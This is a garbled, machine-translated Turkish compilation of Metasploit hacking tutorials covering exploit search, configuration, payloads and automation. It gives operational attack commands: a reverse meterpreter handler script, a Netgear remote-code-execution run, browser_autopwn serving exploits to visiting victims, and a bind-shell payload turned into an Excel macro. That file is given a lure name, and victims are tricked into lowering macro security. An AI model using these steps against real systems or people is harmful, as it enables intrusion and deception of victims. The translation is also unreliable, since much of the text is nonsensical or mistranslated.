Metasploit Çerçevesini kullanarak dökülme takibi. Durgunluktan Metasploit talimatları Durağanlıktan Metasploit kali talimatları

Kötülük ve Wikoristanny üzerine pek çok makale yazdık Metasploit izlerin nasıl kaybedilmeyeceği, sitenin iç mimarisinin geliştirilmesi ve ayrıca komutlar ve komut dosyalarıyla ilgili birçok hile sayfası dahil.

Bu yardımcıyla başlangıç ​​ve öğrenmeye yönelik kapsamlı bir makale dizisine başlıyoruz Metasploit. Bu çok önemli bir kısımdır, ancak temel bilgiler kısaca gözden geçirilecektir. Metasploit- Dünya gezegenindeki en güçlü hacker platformlarından biri.

Metasploit nasıl kurulur

Metasploit- 2003 yılında hacker HD Moore tarafından dağıtılan açık kaynak kodlu bir proje. Üzerine yazıların başlaması perl, ancak 2007'de çalışma tamamen yeniden yazıldı. Yakut. 2009'da gerçekleştirilen satın alma sayısı Hızlı7 bilgi güvenliği hizmetleri sağlama konusunda uzmanlaşmış ve aynı zamanda bir dökülme tarayıcısı da üreten bir şirket NEXPOZ.

Metasploit 4.12 sürümü zaten dağıtım kitine dahil edilmiştir Kali Linux . Aynı şekilde Geri Takip. Başka bir dağıtımın vikoristliğini yapıyorsanız Linux ya da başka MaxOS, o zaman bu siteyi ziyaret etme şansınız olacak Hızlı7.

Ne tür bir vikoristsin sen? pencereler, o zaman sen de etkileneceksin Metasploit Siteden Hızlı7, ancak onu çalıştırmanızı önermiyoruz. pencereler. Elbette bunu bu yazıda görebildiğimiz birçok fonksiyonla yapabilirsiniz, sadece orada çalışmayın.

sen Metasploit Dahil olmak üzere birçok versiyon var. Metasploit Pro(çoğunlukla ticari versiyon) ve Topluluk Sürümü(Bezkoshtovna). Geri kalanın ekseni yeni oluşturuldu Kali. şuna odaklanıyoruz: Topluluk Sürümüçoğunuzun satın almayacağını düşündüğümüz için Profesyonel sürüm değeri 30.000$.

Metasploit Wikimedia Yöntemleri

MetasploitÇeşitli şekillerde vikorist olabilirsiniz. Her zaman kullanabileceğimiz en gelişmiş yol interaktif konsoldan geçiyor. Metasploit. Komut satırına msfconsole girilerek etkinleştirilir Kali. Ayrıca bir dizi başka yöntem de vardır.

Msfcli

Sonuçta vicorista yapabilirsiniz Metasploit H Komut satırı Kali veya modunda msfcli. İlk bakışta konsoldayken komut satırında galip geliyoruz gibi görünüyor. Aslında özel anahtar kelimeler ve komutlar içeren bir vikoryst etkileşimli konsolumuz var. Bunu yaptığımızda msfcli, o zaman aslında bir vikorist Linux komut satırıdır.

Mevcut tüm komutlarla ilgili bilgileri görüntülemek için msfcli, konsola şunu yazın:

Kali > msfcli -h

Şimdi Vikonati'nin sömürmesine izin ver msfcli komutu yazın:

Kali > msfcli yük = ana bilgisayar = lhost = e

De "E" - "Yürüt"ün kısaltması (viconati)

İstatistiklerimiz iyi sonuçlar veriyor yük(korisnyh navantazheni) anti-virüs programlarına karşı koruma sağlamak için vikoryst komutunu kullanın msfencodeі msfpayload komut satırı modunda ( msfcli).

Vikoristannya'dan çok uzak değil msfcli bu kadar nazik davranılmayanlar msfconsole ve tek bir kabukla çevrelenmiş olması, karmaşık istismarlarla çalışmayı imkansız hale getiriyor.

Armitaj

Vikorist olmak ister misin? Metasploit grafiksel bir arayüz (GUI) ile bir dizi seçenek vardır. Örneğin Raphael Mudge Armitaj(Bu, siber hacklemeyi konu alan büyük orijinal bilim kurgu kitabı “Neuromancer”daki ana karakterin adıdır. Bu türü hak eden bir cilt korsanı tarafından okunabilir.) Bilimkurgu).

Haydi çalıştıralım Armitaj V Kali, şunu girmeniz yeterli:

Kali > armitaj

Yakşço Armitaj Bağlanamıyorsanız şu diğer komutları deneyin:

Kali > hizmet postgresql kali'yi başlat > hizmet metasploit'i başlat kali > hizmet metasploit'i durdur

Armitaj- bu grafik arayüzün üstünde Metasploitİstemci-sunucu mimarisinin gereksinimleri. Başlatıyorsun Metasploit bir sunucu olarak ben Armitaj müşteriniz olur ve size Kamu erişim işlev görmek Metasploit sezgisel olarak akıllı olmasa da tamamen işlevsel bir yardım için GUI. Gerçekten neye ihtiyacın var? GUI, rahat ol o zaman, nazikçe, vikorist Armitaj. Ancak komut satırında olmak, kendine saygısı olan her bilgisayar korsanı için pratik bir zorunluluktur.

Modüller

sen Metasploit Altı farklı modül vardır:

  1. yükler
  2. istismarlar
  3. postalamak
  4. hayır
  5. ek
  6. kodlayıcılar

Yükler- Bu şeytani sistemde kaybettiğimiz kod. İnsanlar bunlara dinleyici, rootkit vb. diyor. sen Metasploit Kokulara yük (kahverengi navantazhenny) denir. Yükler komut satırı yardımcı programlarını etkinleştirin, Sayaç yorumlayıcısı vesaire. Yük Sen patlama yaşıyorsun farklı şekillerÖrneğin, sahnelenmiş, Çizgide, NoNX(aktif için “Yürütme Yok” fonksiyonunu atlayın mevcut işlemciler), PasifX(güvenlik duvarı kurallarını atlayın giden trafik), IPv6 ve diğerleri.

İstismarlar- bu, sistemdeki kısır bir etki ve eksiklik olan bir kabuk kodudur. Bu çok özel bir koddur. Örneğin, işletim sistemi, hizmet paketleri (SP), belirli hizmetler, bağlantı noktaları ve eklentiler için açıklardan yararlanmalar mevcuttur. Ayrıca türlere göre de sınıflandırılabilirler. işletim sistemleri bu bir istismar pencerelerçalışma Linux Ve tesadüfen.

Postalamak- Sisteme yönelik istismar sonrası saldırılarda (sisteme erişim engellendikten sonra) kullanılabilecek modüllerdir.

hayır- Kısa versiyon İŞLEM YOK. X86 ailesindeki işlemciler için onaltılık 0x90 olarak belirtilir. Bu sadece "hiçbir şey yapma zahmetine girme" anlamına gelir. Bu, arabellek taşması saldırıları için daha büyük önem taşıyabilir. Modüllere bakabiliriz hayır yardım için ara göstermek.

Msf>hayırları göster

Ek- diğer kategorilerden birine uymayan bir dizi modül (695) içerir. Onlardan önce füzerler, tarayıcılar, DoS saldırıları için modüller (hizmetteki VMware'de) ve çok daha fazlası var. Daha detaylı bilgi için sizi bu konudaki yazımıza yönlendiririm. Ek modüller.

Kodlayıcılar- Bu modüller, anti-virüs programlarını ve diğer güvenlik sistemlerini atlatmak için veri yüklerimizi farklı şekillerde kodlamamıza olanak tanır. Bu kodları yazarak alabiliriz:

Msf>kodlayıcıları göster

Nasıl konuşuyorsun, ah Metasploit Birçok kodlayıcı üzerinde çalışmak zorunda kaldım. Bizim favorilerimizden biri - shikata_ga_nai. Vіn vikorist olmanızı sağlar yük XOR aldatmaya ne yardımcı olur antivirüs programları ve diğer güvenlik sistemleri.

Aramak

sen Metasploit 4 arama imkanı ortaya çıktı. Daha önce vikorist olma şansım vardı msfcli o takım grep Modülleri bilmek. Şimdi Hızlı7 anahtar kelimeler ve diğer özellikler için aramalar ekleme. Aramaya eklenen parçalar daha da yeniydi MetasploitÇok büyüdüm ama şimdi soruları arıyorum grep Artık 1400'den fazla istismar arasında yeterli bilgiye sahip değildik.

Anahtar kelimeleri aramak, basit bir arama yapmanıza veya daha ayrıntılı aramalar yapmanıza olanak tanır. Örneğin bilmeniz gereken modül tipini, vikori'yi belirleyebiliriz. anahtar kelime tip:

Msf > arama türü:istismar

Yakshcho mi tse zrobimo, o zaman Metasploit Bize 1295 istismar verin. Korisny bile değil.

Ale arabaya saldırmak istediğimizi biliyoruz Sun Mikrosistemleri Keruvannyam yakınında Solaris (Güneş UNIX'i), o zaman aramamızı netleştirebilir ve yalnızca sömürü için arama yapabiliriz Solaris. Anahtar kelimeyi neden aramamız gerekiyor? platformu.

Msf > arama türü:istismar platformu:solaris

Şimdi karşı çalışan bu birkaç istismara yönelik arayışımızı duyduk. Solaris.

Daha fazla açıklama yapmak gerekirse, saldırmak istediğimiz şeyi aramak kabul edilebilir. Solaris RPC'si (sunrpc) Ve tabii ki bu özel hizmete saldıran istismarlardan kaçınmamız gerekiyor. “anahtar kelimesini ekliyoruz” sunrpc"bizim ses sinyali açık, Aşağıda gösterildiği gibi:

Msf > arama türü:istismar platformu:solaris sunrpc

Gördüğünüz gibi, beşe kadar istismar modülü için arama sonuçlarının sonuçları burada!

sen Metasploit Gelecek makalelerde görmeye devam edebileceğimiz birçok olasılık var Metasploit. Şimdilik bazı tüyoları deneyin Metasploit Sitedeki diğer yazılarda anlatılanlar. Arkanı dön! Vivkit Metasploit Ve bir profesyonel gibi kötülük yapmaya başla!

Vidmova'nın sorumluluğu: Bu makale yalnızca gayri meşru amaçlarla yazılmıştır.Yazar bu makaleyi hiçbir zaman gayri meşru amaçlarla yayınlamamıştır. Eğer okuyucular kendi çıkarları için hızlı bir şekilde bilgiye ulaşmak istiyorlarsa, bu durumda yazarın herhangi bir fesat ve fesattan sorumlu olmadığı açıktır.

Metasploit nedir?

Metasploit(ve metasploit'ten bir proje hakkında konuşmak doğrudur) - projenin kendisi bilgisayar güvenliği departmanındandır, paydaşlara (özellikle hükümet yetkililerine, distribütörlere ve yöneticilere) bilgi yönlendirir ve güvenlik sistemindeki olası sızıntılar hakkında bir kaynak havuzuna sahiptir ve sistemlerin ve ölçümlerin test edilmesine yardımcı olur Kapılar kapatılarak güvende ve korunurlardı. Meta istismarları geliştirmek için özel bir ortam vardır: Metasploit Çerçevesi. Geri kalanı, uzaktaki bir makinede açıkların geliştirilmesi ve geliştirilmesi için bir yazılım ara yazılımı ve platformu olan kendi alt projesine dönüştü. Platformun besleyici gücü ve bir bütün olarak projenin durgunluğu sümüksü kalacak, ortadaki parçalar son aktiviteyi gerçekleştirmeden önce tıklanacak sistem yöneticileri Güvenlik önlemleri, bilgisayar korsanları tarafından, kaynaklara yetkisiz erişimi engellemek amacıyla yeni güvenlik açıkları geliştirmek ve geliştirmek için başarıyla kullanılır.

Metasploit Çerçevesi 2003 yılında piyasaya sürülmesinden bu yana bazı değişiklikler gördü ve hem ücretsiz hem de ticari sürümler için oldukça genişletilmiş bir lisansla bize geldi. Seçenekler, belirlenen sorunlarla başa çıkmanıza yardımcı olacak birçok hazır istismar içerir. Unix'te sorunsuz çalışır Windows sistemleri, tarayıcı penceresinin yakınında seçebileceğiniz çok sayıda arayüz vardır.

Metasploit Framework nasıl kullanılır veya metasploit nedir? Orta yolun temel ilkeleri.

Ortada çalışmaya başlamadan önce, bilgisayar hakkında mümkün olduğunca fazla bilgi toplamak kesinlikle gereklidir, bu nedenle bir dizi adımdan geçmeniz gerekir, bu nedenle istismar ve yük seçimi üzerinde çalışmanız gerekir.

Metasploit Çerçevesi nasıl kullanılır?

O eksen burada:

https://www.metasploit.com/download/

Ale, acele etme. Platform ayrıca ücretsiz ve ücretsiz bir lisans altında geniş çapta dağıtılabilen çok çeşitli sistem montajlarını da içerir. Bunu Linux bölümündeki blog sayfasından biliyoruz. Depo pek çok deneye katılmadan önce ortasına girmek kesinlikle güvenlidir.

Birbirimizi tanımaya çalışıyoruz Shel.

Bu, istismarın türüne bağlıdır, bundan sonra istismar hayata entegre edilir, sağ tarafta veya uzak bir kabukla görebiliriz ( Uzak kabuk) şu metre kabuğu ( Meterpreter kabuğu).

Kabuk eklendibilgisayar programı Klavyenizin arkasında ne olursa olsun, uzaktaki bir bilgisayara komut girebileceğiniz komut satırından (terminal). Bu Masaüstüdür (Windows'un çağrıldığı gibi). Bilgisayar korsanının kurbanın bilgisayarına standart komutlar yüklemeyi planladığı durumlarda standart kabuk durgun hale gelir. Ancak mevcut oturumda karmaşık manipülasyonlardan ve vicoristano Shell Meterpreter olacak ek işaretlerle komutların oluşturulmasından bahsediyoruz.

Z metre kabuğu biraz daha. Meterpreter kabuğu Zaten bir sürü hazır yazılım çözümü sunuyor. Bu, aşağıdaki konularda bilgi toplamaya yönelik yardımcı programları ve komut dosyalarını içerir: uzaktaki bir bilgisayara, mikrofonlar ve web kameraları vb. gibi cihazları izlemeye yönelik araçlar. Teknolojinin gelişmesiyle birlikte büyüyen, mükemmelleşen hazır çözümlere ve daha fazlasına ilgi artıyor. Ve şimdi her şeyin açıklaması hakkında biraz daha.

İstismarın yapılandırmasını arayın

Halihazırda Cali'de olmanızı takdir ediyorum. Metasploit'i başlatıyoruz ve mevcut istismarları görüntüleme komutunu veriyoruz. Tse ekibi

Terminal, istismarlarla ilgili bilgileri alfabetik sırayla görüntüler. Bunu manuel olarak unutmayın, arama, arama için görevliler tarafından şu şekilde açıklığa kavuşturulabilir:

  • Zagalnye püf noktaları sözlüğü ve bezpetlerdeki kapatılmamış delikler ( CVE Kimliği). Aşağıdakileri hemen girebilirsiniz:
arama özgeçmişi:2017

  • Microsoft Güvenlik Bülteni
MS'de arama yap
  • bazhana programının veya virobnik PZ'nin hemen arkasına yoksa ekleyeceğim
Netgear'da arama yapın

  • Ve işareti seçtikten sonra, bu sürücüden dökülmeden önce eklenen dökülmeyle ilgili tüm bilgileri alın bilgi(Bu yemek hakkında daha fazla bilgi aynı terminallerde yayınlanacaktır). Bir göz at:

Oradaki her şey analizinizi ve durgunluğunuzu kontrol ediyor. Bundan önce, Exploit konfigürasyonuna nasıl girilir, komutuyla rauntta bir sızıntı alalım. kullanmak

Veya ön pencerelerden birine dönerek, ustalaşana kadar aşağıdaki istismarı ortaya çıkarın ve dondurun:

Ve onu nasıl hapsedeceğimizi ve ne ölçüde bağlayacağımızı, bildiğimiz vikoryist ve asteğmen olduğunu hemen doğrulayabiliriz. bilgi istismar bağlamında:


Yapılandırmadan yararlanma: yüklü seçenekler

Ekibimiz metasploiti doğru yöne yönlendirmemize yardımcı olacak ayarlamak . Takım msf Gelecekte görebiliyorum

name_change_value'yu ayarla

Kullanım için hangi değişikliklerin olduğunu öğrenmek için şu komutu kullanabilirsiniz: seçenekleri göster

Rozdil Modül seçenekleri sancak ile komutanlığın askerlik hizmetinden bizim tarafımızdan biliniyor bilgi, bir cihaz seçerken konfigürasyonun nasıl ayarlanabileceğini gösterir. Böylece modül, bu zorunlu seçeneklerin durgunluğundan dolayı dökülmeye karşı durgunluk kullananları (iş öncesi sancağı görmeye hazır) anında belirtir. Evet, ne var HAYIR henüz buna alışamadın). Pentester'ı istismar amacıyla kullanmak için aşağıdakileri kullanın:

  • uzak sistem adresleri ( RHOST)
  • uzak bağlantı noktası 8080 ( RAPOR)
  • bir meth dedektörü olarak ( HEDEFURİ) – sistemdeki durgunluğa giden yol veya mağdurun mülkiyetine giden yol (örneğin, bir yönlendirici saldırıya uğruyorsa, burada dökülen dosyanın görünür adresinde yeni bir yol gösterilir)

Resmi bronzlaşarak bitirelim. İstismarın Wi-Fi pad'imizde başlatılması şuna benzer:

Exploit(netgear_nms_rce) msf istismarını kullan(netgear_nms_rce) RHOST 10.10.10.10'u ayarla RPORT 8080'i ayarla TARGETURI istismarını ayarla -j

Tat açısından yukarıda açıklanan komutlara gerek yoktur. Daha detaylı bilgi daha sonra verilecektir.

Vibir ve kalıplama yükü

Orada hiçbir şey alamadığımız için başka birinin bilgisayarına erişmemiz gerekiyor mu? Ve bu amaçla bir yüke ihtiyacınız olacak. Tıpkı bir metasploit gibi, bir payload da sistemin işlevselliğini değiştirmek üzere tasarlanmış işe yaramaz bir yazılım parçasının parçasıdır. O zaman, yazılımın başka bir parçası doğrudan ek işlevlere dayanabildiğinden (örneğin, kendini kopyalamak ve çoğaltmak; mova devam eder). bilgisayar virüsü). Tahmin edebileceğiniz gibi payload tek bir koda bölünüp farklı seçeneklerle birleştirilebilir.

Metasploit'in ortasında çalışırken, yüzlerce seçilmiş istismar için hazır yük seçeneklerine hayran kalabilirsiniz. Takım olarak utangaç olun

Yükleri göster

seçtiğiniz yararlanma seçeneği. Başka bir seçenek de seçilen istismara yazmaktır

Yükü ayarla

ve tuşa iki kez basılarak sabitlenir Sekme. Metasploit size hiç bakmak isteyip istemediğinizi sorar... Paylouds. Metasploit terminalinin faydalı yüklerden gelen bilgileri şu formatta görüntülemesini etkinleştirin: İşletim Sistemi/Kabuk Türüİşletim sistemi/Kabuk türü. Örneğin

Yükü/windows/shell_reverse_tcp'yi ayarlayın

Gerekli işletim sistemi ve size uygun yük tipini seçemezsiniz. En popüler yük türleri, daha sık bahsettiğimiz kabuklarla aynıdır (kaldırmalar ve yorumlayıcılar veya metre-Shel).

Ara yazılım önbelleğindeki yüklerin seçimi daha da geniştir. Yani tıpkı maliyeti seçerken olduğu gibi, ek yardım için kurbanın sistemi hacker'a "dökülür" Gerekli Bilgi. Tabanlı tipik kabuklar ters_tcp Komutlar bu amaç için çok önemlidir: Uzak bir sistemde oturum açarak, genellikle sistem güvenlik duvarında şüphe yaratmadan saldırgana veriler hakkında bilgi verirler.

Güle güle. İyi şanlar

7 yıl önce dünyada ortaya çıkan MSF, çalışan alaşımların yazılması için basit bir çerçeveden bir tür “İsviçre bıçağına” ve şimdi değişiklikten önce bilgi toplamak için gerekli her şey dahil olmak üzere pentestler yürütme konusunda tam bir dehaya dönüştü. sömürü sonrası yöntemler. MSF'nin en çok kullanılan araçlardan beşine kadar girebilmesi boşuna değil. Neden olmasın; MSF büyümeye ve gelişmeye devam edecek! Ve herhangi bir doğrudan şekilde - bu makaleden biliyorsunuz.

Başlangıçta makale, MSF'deki eylemlerin otomasyonunun olanaklarını tanımlamayı amaçlıyordu, ancak insanların çerçeve hakkındaki bilgilerini analiz ettikten sonra, kendisinin az çok ilham veren olasılıkları ortaya çıkacak ve otomasyonu hakkında da bilgi verilecekti. yol boyunca söyledi. Sadece insanlar bisiklete binmemeli :).

Bilgiden bahsetmeden önce. İngilizce'de Metasploit hakkında kapsamlı makale/kitap bulunmadığından bu kadar çok olmaması şaşırtıcı değil. Dolayısıyla ana bilgi kaynakları yabancı bloglar ve bireysel araştırmalardır. Ayrıca sessiz olun çünkü Ruby basittir ve diğer insanların kıçlarının ardında kendi becerilerinizi öğrenebilirsiniz.
Güle güle! Anlatılan her şey boşuna kalan sürüm- MSF 3.4.2.

GUI dönüyor!

Konsolu sevmeyenler veya MSF komutlarını anlayamayacak kadar tembel olanlar için GTK'yı temel alan bir kabuk var. Daha doğrusu 3.3 versiyonuna sahip parçaların öldürüldüğünü fark ettim. Hiç merhametim yok, aynı şey msfweb'de de oldu. Bencil olmak hâlâ mümkün, yoksa istikrarla ilgili sorunlar olurdu, ama işte... eh!

Ancak makalenin hazırlanma saatinden hemen önce iyiydi; tüylerim diken diken oldu. Hem ortası hem de ortası değişti. Daha kesin olmak gerekirse, Java ile yazılmıştır, dolayısıyla platformlar arasıdır ve aynı zamanda XMLRPC arayüzü aracılığıyla MSF ile etkileşime girer, böylece onu uzaktan düzenleyebilirsiniz.

Programın başlatılması iki aşamada gerçekleşir: msfpcd ile başlayıp msfgui aracılığıyla bir sonrakine bağlanma. Sunucunuzun altında çalışan msfgui ile "yeni msfprcd başlat" yazmanız yeterlidir.

Sürümü kazan:

  1. Cygwin konsolunu başlatma
  2. cd /msf3
  3. msfrpcd -S -U kullanıcı adı -P şifre de -S - SSL bağlantısı ve bir giriş/şifre oluşturun
  4. %MSF%\msf3\data\gui dizinine kaydedilen msfgui.jar'ı çift tıklamayla veya konsolda (cygwin'de değil) başlatın: java –jar msfgui.jar

Msfgui'de oturum açma/şifre, bağlantı noktası, IP girin ve bağlanın.

Görünüşe göre eski günlerde bir şeyler büyümüyor. Örneğin, konsola erişim veya günlükleri görüntüleme. Bunu, özellikle eklentiler, modüller arasında hızlı bir şekilde gezinmeniz, başka birinin bilgisayarında gezinmeniz vb. gerekiyorsa da yapabilirsiniz.

Bilgi toplanması

MSF'nin, modülleri arasında alınıp verilen bilgileri depolamak için bir veritabanı üzerinde çalıştığını biliyor olabilirsiniz. Ve bu aktif olarak gelişiyor.

Çoğunlukla desteklenen tek veritabanı PostgreSQL'dir. SQLite üretkenlik/ölçeklenebilirlik sorunlarından yararlanırken, MySQL artık sorunsuz bir şekilde ilerledi. Ancak sorunlardan Postgres kurulumu sorumlu değildir. İletişim sürücüsü MSF'den yerleşiktir.

Win: set altında istemcinin geçişini (postgres ve port) ayarlayın.

pgAdmin aracılığıyla: yerel sunucuya bağlanıyoruz, başka bir "Giriş Rolleri" (msf_user) kullanıcısı oluşturuyoruz, "Baz" da (msf_db) bir veritabanı oluşturuyoruz. Burada ayrıca SQL sunucusunu "güvenli bir şekilde" oluşturarak yapılandırabilir ve MSF tablolarında gezinebilirsiniz.

msf> db_driver postgresql
msf> db_connect msf_user: [e-posta korumalı]:5432/msf_db

Artık db_create komutu gelişigüzel çalışmıyor, yalnızca orijinal veritabanına bağlanabiliyorsunuz ve ayrıcalıklara sahip olduğunuz için (postgres kullanıcısı gibi) veritabanı otomatik olarak oluşturulacak. Aksi takdirde veritabanını Postgres ile manuel olarak oluşturun.

Ama o kadar da korkutucu değil, çalışma alanlarını da kullanabilirsiniz. Tabloların kendisi olmak üzere tek bir veritabanı vardır, ancak modüller akış alanına bilgi alışverişinde bulunur/ekler. Eğer denerseniz anlarsınız ki db_workspace size yardımcı olacaktır.

Komutları anlamak için biraz zaman ayıralım:

  • db_service - modüller tarafından taranan veya nmap tarafından içe aktarılan veya içe aktarılan bağlantı noktaları/hizmetler hakkındaki bilgileri görüntüler üçüncü taraf programları. Buna dayanarak db_autopwn –p parametresiyle (bağlantı noktalarına göre) çalışır;
  • db_notes – Nmap'ten çıkarılan işletim sistemi sürümünün türü olan “notlar” veya WMap'ten çıkarılan “ayrıntılar”. Yazık ama db_autopwn, db_notes'ın bir sploit seçmesine şaşırmış gibi görünmüyor.
  • db_vulns – MSF modülleri (WMap) veya Nessus (OpenVAS), Nexpose'dan içe aktarma yoluyla bulunan güvenlik açıkları. Buna dayanarak db_autopwn -x parametresiyle (yayılma için) çalıştırılır.

Örneğin, ana bilgisayarı nmap ile tararız ve sonuçları veritabanımıza göndeririz:

msf> db_nmap -PN -sV 192.168.0.101

MSF'li port tarayıcı modülünün çantası benzer olacak ve veriler de veritabanına gidecek. Yalnızca belirli hizmetler için eksen, diğer modüllerin kullanımını gerektirir (tarayıcı bölümünün sonunda sürümü bulunan tüm yardımcı modüller, örneğin tarayıcı/imap/imap_verison).

msf> tarayıcı/portscan/tcp kullan
msf> RHOSTS'u 192.168.0.101 olarak ayarlayın
msf> PORTLARI 1-1000 olarak ayarlayın
msf> -j'yi çalıştır

Otomatikleştirmek Hikayenin geri kalanı, MSF'de kaynak adı verilen dosyaları hızlı bir şekilde bulabilirsiniz. Temel olarak bunlar, MSF için komutların en son yeniden düzenlenmesini içeren orijinal metin dosyalarıdır. Örneğin, şunun için bir kaynak oluşturuyoruz: İsveç lansmanı Ters sayaç yorumlayıcı için "sunucu". Bu amaçla (metrevhandl.rc) dosyasında aşağıdaki komutlar bulunur:

istismar/çoklu/işleyiciyi kullan
PAYLOAD pencerelerini/meterpreter/reverse_tcp'yi ayarlayın
LPORT 4444'ü ayarlayın
LHOST 192.168.0.102'yi ayarlayın
-j'den yararlanma
geri

Komut dosyamızı ek “kaynak” kullanarak çalıştıralım:

msf> kaynak metrevhandl.rc

Yak bachish - çok kullanışlı. Hepsi bu değil. En iyi şey, bu komut dosyalarında Rubi'de kod yazabilmenizdir; bu, örneğin bitişik MSF modülleri arasında birlikte çalışmamıza olanak tanır.

Konuşmadan önce home/.msf3/msfconsole.rc, msfconsole başlatıldığında otomatik olarak başlatılan bir komut dosyasıdır. Örneğin veritabanından gelen bağlantıyı engellemek gerçekten kolaydır.

Hadi gidelim...

WMAP. WMAP, MSF'yi web programlarına uyarlama ve sağdaki her şeyi otomatikleştirme girişimidir. WMAP projesi henüz başlangıç ​​aşamasında ve özellikle rakipleriyle karşılaştırıldığında pek iyi performans göstermiyor. En azından kendi yöntemleriyle gelişmeleri pek mümkün değil ve bunun nedeni de Rapid7'nin, web'i yönlendirmek için kullanılan açık kaynaklı w3af çerçevesini yoğun bir şekilde finanse etmeye başlaması, böylece en iyi şekilde yararlanmak mümkün. bunun dışında Troschev ve MSF ve w3af'ın işlevselliği. Ama yine de küçük bir popo (veritabanına bağlantı gerektirir):

1. Wmap eklentisini öneriyoruz:

msf> db_wmap'i yükle

2. Kurban ekleme:

msf> wmap_targets -a http://www.example.com/

3. Kurbanımıza karşı başlatılan modüllere bir bakış:

msf> wmap_run -t
msf> wmap_run –e

Çantalar veritabanında saklanır ve db_vulns, db_notes aracılığıyla erişilebilir.

Bazı modüller parametrelerin ayarlanmasını gerektirecektir. Yardım için setg komutunu kullanabilirsiniz. WMAP'in ayrıca bir tarayıcısı (wmap_crawler) ve bir proxy ile etkileşim kurma yeteneği (wmap_proxy) vardır.

Ayrıca, farklı enjeksiyonlarla veritabanlarına eziyet etmeyi sevenler için MSF modülü - tarayıcı/http/sqlmap'e göz atmanızı öneririm. Tek isimli araç bağlantı noktası SQLmap'tir. Bu arada zengin güçlüdür :). Araçlarla ilgili bilgileri yaratıcıların web sitesinde bulabilirsiniz -.

db_autopwn

MSF'de otomatik park etme birkaç temel parametreye sahiptir:

  • -R – mevcut istismarın minimum derecesini belirtir;
  • -m – regexp'i sal seçimine ayarlayın.

Örneğin:

msf> db_autopwn -t -p -m windows -R mükemmel

Standart Win hizmetleri için en kısa bağlantıların bir listesini göreceksiniz.

Konuşmadan önce, sürüm 3.3.1'den itibaren Nexpose doğrudan MFS'den işlenebilir ve tespit edilen sorunlara göre otomatik olarak güncellenebilir.

1. Eklentiyi destekliyoruz ve Nexpose'a bağlanıyoruz:

msf> sonrakini yükle
msf> nexpose_connect msf_user: [e-posta korumalı]

2. Dökülme tespitleri için yalnızca en kısa ağları başlatıyoruz:

msf> nexpose_scan -R mükemmel -x 192.168.0.101

Tarayıcı_autopwn

Ön sayfa standart katmanlar için tasarlandığından, bu, adından da anlaşılacağı üzere kurbanların tarayıcılarını hedef alan istemciler içindir.
Temel olarak, bu modül HTTP sunucusunu yükseltir ve ardından tarayıcılar için tüm bağlantıları yükseltir. Bir kurban sunucumuza giriş yaptığında modül, tarayıcı sürümünü ve işletim sistemini algılar ve ardından üçüncü tarafı başlatır. Şimdilik modülün ana özelliği tam tarayıcı/işletim sistemi sürümüdür. Vikorist'in hem sunucu hem de istemci yeteneklerini (JavaScript) algılaması ile. Farklı bir Kullanıcı Aracısı tanıtarak modülü kandırmak kesinlikle mümkün değildir.

Ortalıkta tarayıcıların bazı iyi eski tarz versiyonları mevcut, ancak en iyi yanı, sadece kendi tarayıcılarınızı eklemenizdir ve güç budur. Dışarı çıkmanın hiçbir maliyeti yok.

Gelecek sürümlerde, alaşımların karartılması (böylece antivirüsler tarafından yakılmamaları için) ve avantaj seçme yeteneği için ek olasılıkların olması bekleniyor.

Örneğin 192.168.0.102 kabukları için backconnect’li bir sunucu oluşturalım:

msf> sunucu/browser_autopwn'ı kullan
msf> LHOST'u 192.168.0.102 olarak ayarlayın
msf> index.php URI'sini ayarla
msf> -j'den yararlanın

VBA

EasyHack bölümünde, MSF kullanarak Truva atları oluşturma veya exe dosyalarını gönderme hakkında zaten yazmıştım - ki bu daha da kötü. Paslı olanlar kabarık hale gelmiş ve yıpranmış her şeyi açmıyor, ayrıca rüzgardan da ilerleme var. Tüm ofis dosyalarınızı koyabileceğiniz en iyi yer neresidir?

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

Daha sonra, örneğin "Askere alınanların maaşları" gibi korkunç adlara sahip bir Excel belgesi oluşturuyoruz. Daha sonra VBA alıntılarını açıyoruz, makronun metni (MAKRO KODU) belge makrosunun içine yazılıyor (Araçlar -> Makro -> VB Düzenleyici) ve örneğin belge bizim “takıntımız” (ÖDEME VERİLERİ). Belge başlığına her türlü renklendirmeyi ekleyebilirsiniz. Makrolardan bazıları varsayılan olarak etkindir (bildiğim kadarıyla OfficeXP sürümünden), ardından “Saygı! Tabanla çalışmak ancak makroların dahil edilmesiyle mümkündür. Bunları kapatmak için “Araçlar –> Seçenekler –> Güvenlik –> Makro Koruma –> Düşük” yolunu izleyerek belgeyi yeniden başlatın, kullanıcının makroları etkinleştirmesini sağlayabilirsiniz. Sonuç, 5555 numaralı bağlantı noktasındaki bir kabuktur.

Sensove navantazhennya

Sağa doğru yük seçimi önemlidir. Ancak MSF'de bunlardan çok var, bu yüzden daha derin bir anlayış ortaya çıksın diye biraz üzerinden geçeceğim (çoğunlukla Win*). Öncelikle AXES'in yanı sıra PZ'nin kendisi ve ilgilenen tercümanlar (Ruby, Perl) ile ilgili bir alt bölüm var.

Açıklamanın arkasındaki gizli kenar:

  • “Satır İçi” simgesiyle “tam” kodlar vardır. Koku harika, bu yüzden tekrar istismarlara başvurmanıza gerek kalmayacak;
  • "Stager" - bakış açısı, parçalara bölünme. Sploitin küçük bir dikişi vardır, esas olarak kurulum içindir, bağlantı bağlandığında ayarlanır;
  • "Ord" - "hapsedilmiş" navantazhenya. Boyutu küçüktür ancak sistem DLL'sinin belleğindeki statik bir adrese bağlıdır;
  • “Bind” – bağlantı noktasını açar ve bağlantıyı açar;
  • "Ters" - geri bağlantı kabuğu;
  • “Findport” – istismarın çalıştığı soket için bir arama yapıldı ve ardından yeni bir tane aracılığıyla açıldı. Bağlantı noktası numarasını arayın;
  • “Findtag” - birincisine benzer şekilde, sokete atanan tek şey, bilgisayar korsanından gelen tüm mevcut 4 baytlık etiketleri dinlemektir.;
  • “Exec, Download_exec, Up_exec” – komut başlatma komutu, indirme/indirme ve başlatma;
  • "VNC" - kurbanın VNC sunucusunu başlatır;
  • “dllinjection” – işlem belleğindeki DLL'nin geliştirilmesi. DLL enjeksiyonunun iki türü vardır;
  • "metsvc" - kurbanın ölçüm yorumlayıcısını tamamen çeker ve onu bir hizmet olarak kaydeder;
  • "PassiveX" - kabuğumuz bir ActiveX öğesi gibi davranır.
  • "NoNX" - DEP bellek koruma mekanizmasını atlayan ipek kod;
  • "DNS" - IP ile değil ana bilgisayar adlarıyla işlenebilenler;
  • “HTTPS”, şifrelenmiş HTTPS protokolünü izleyen bir kabuktur (elbette proxy desteği olmadan).

Biraz PassiveX'e takıldım çünkü koku çok kötü.
